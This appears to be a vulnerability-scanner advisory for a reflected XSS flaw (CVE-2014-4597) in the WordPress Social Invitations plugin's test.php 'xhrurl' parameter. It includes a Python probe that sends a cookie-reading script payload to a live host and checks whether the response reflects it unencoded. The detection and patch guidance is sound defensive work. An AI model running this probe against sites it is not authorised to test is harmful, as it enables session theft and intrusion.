WordPress Social Invitations Plugin 'test.php' XSS Vulnerability

Published: 2014-08-26 10:28:57
CVE Author: NIST National Vulnerability Database (NVD)

CVSS Base Vector:
AV:N/AC:M/Au:N/C:N/I:P/A:N

Summary:
The WordPress Social Invitations plugin installed on this host is prone to a reflected cross-site scripting (XSS) vulnerability.

Detection Method:
Send a crafted HTTP GET request carrying a script payload in the affected parameter and check whether the response reflects the payload unencoded, i.e. whether the injected script would be able to read the cookie.

Technical Details:
Input passed via the 'xhrurl' HTTP GET parameter to the test.php script is not properly sanitised before being returned to the user, so the value is reflected into the response unencoded.
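To make the detection method and the reflection described above concrete, here is an added example in Python (not the scanner's own check and not the plugin's code) that builds the crafted GET request against the 'xhrurl' parameter and classifies a response by whether the payload comes back unencoded. The plugin path /wp-content/plugins/wp-social-invitations/test.php, the example host name and the two sample response bodies are assumptions constructed for this example; the page itself only gives the file name and the plugin slug.

```python
"""Reflected-XSS probe for the test.php 'xhrurl' parameter, with an offline
self-check on constructed responses. Added example; not the scanner's own
detection code and not the plugin's code."""
import html
from urllib.parse import urlencode, urljoin
from urllib.request import Request, urlopen

# Assumption: the script sits at the top level of the plugin directory. The page
# only names the file (test.php) and the plugin slug (wp-social-invitations).
PLUGIN_PATH = "/wp-content/plugins/wp-social-invitations/test.php"

# Probe payload mirroring the page's "can it read the cookie" check.
PAYLOAD = "<script>alert(document.cookie)</script>"


def build_probe_url(base_url, param="xhrurl", payload=PAYLOAD):
    """Crafted GET URL: base site + plugin script + URL-encoded payload."""
    return urljoin(base_url, PLUGIN_PATH) + "?" + urlencode({param: payload})


def classify_response(body, payload=PAYLOAD):
    """Decide what the server did with the payload.

    'vulnerable'    - payload reflected byte-for-byte (a browser would execute it)
    'encoded'       - reflected only as &lt;script&gt;... (output is HTML-escaped)
    'not reflected' - payload does not appear at all
    """
    if payload in body:
        return "vulnerable"
    if html.escape(payload, quote=True) in body:
        return "encoded"
    return "not reflected"


def probe_live(base_url, timeout=10):
    """Send the crafted request to a real host and classify the response.
    Only run this against systems you are authorised to test."""
    req = Request(build_probe_url(base_url), headers={"User-Agent": "xss-probe"})
    with urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return classify_response(body)


# Constructed sample responses (not captured from a real install): what an
# unpatched script that echoes the parameter back looks like, and what a fixed
# one that HTML-encodes its output looks like.
VULNERABLE_BODY = (
    '<html><body><div id="status">Requesting '
    "<script>alert(document.cookie)</script></div></body></html>"
)
PATCHED_BODY = (
    '<html><body><div id="status">Requesting '
    "&lt;script&gt;alert(document.cookie)&lt;/script&gt;</div></body></html>"
)


if __name__ == "__main__":
    print(build_probe_url("http://wp.example.test/"))
    print("unpatched:", classify_response(VULNERABLE_BODY))
    print("patched:  ", classify_response(PATCHED_BODY))
```

Note that this is a coarse reflection check, which is what a remote scanner can do: a response that reflects the value inside a JavaScript string or an HTML attribute may still be exploitable even when `<` and `>` are encoded, so an "encoded" verdict means the obvious payload is neutralised, not that the parameter is safe in every context.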

Impact:
Successful exploitation allows an attacker to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.

Affected Versions:
WordPress Social Invitations Plugin versions before 1.4.4.3

Recommendations:
Upgrade to version 1.4.4.3 or later.

Solution Type:
Vendor Patch

Detection Type:
Remote Vulnerability

NIST (National Institute of Standards and Technology) NVD (National Vulnerability Database)

https://nvd.nist.gov/vuln/detail/CVE-2014-4597

SecurityFocus Bugtraq ID:

https://www.securityfocus.com/bid/65268

References:

http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014070134
http://codevigilant.com/disclosure/wp-plugin-wp-social-invitations-a3-cross-site-scripting-xss
http://wordpress.org/plugins/wp-social-invitations

Severity:
Medium

CVSS Score:
4.3
